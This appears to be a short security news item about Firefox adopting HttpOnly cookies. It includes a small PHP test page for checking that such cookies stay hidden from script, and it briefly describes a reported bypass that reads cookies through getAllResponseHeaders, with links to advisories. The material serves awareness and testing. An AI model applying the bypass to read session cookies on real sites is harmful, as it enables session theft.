New Firefox security functionality is vulnerable
Originally, only Internet Explorer version 6 SP1 and higher versions have supported the cookie format with this additional attribute (Set-Cookie: VAL=023; expires=Tuesday, 24-Jul-07 23:12:40 GMT; httpOnly). So far, only a few pages have used HttpOnly cookies due to compatibility problems. The following piece of code would be enough to test one’s own server under PHP:
<?php header("Set-Cookie: hidden=value; httpOnly"); ?> <html> <body> <script> alert(document.cookie); </script> </body> </html>
When the browser is launched, the alert box remains empty.
However, the demonstrated exploit is only possible under unusual conditions. It requires the malicious code to reside in the same trust domain as the attacked server (e.g. as a virtual host). Further the server always sets a cookie in the HTTP response header where it can be read by the client using the req.getAllResponseHeaders method.
- XS(T) attack variants which can, in some cases, eliminate the need for TRACE, security advisory by Amit Klein
- Round-up: Ways to bypass HttpOnly (and HTTP Basic auth), security advisory by Amit Klein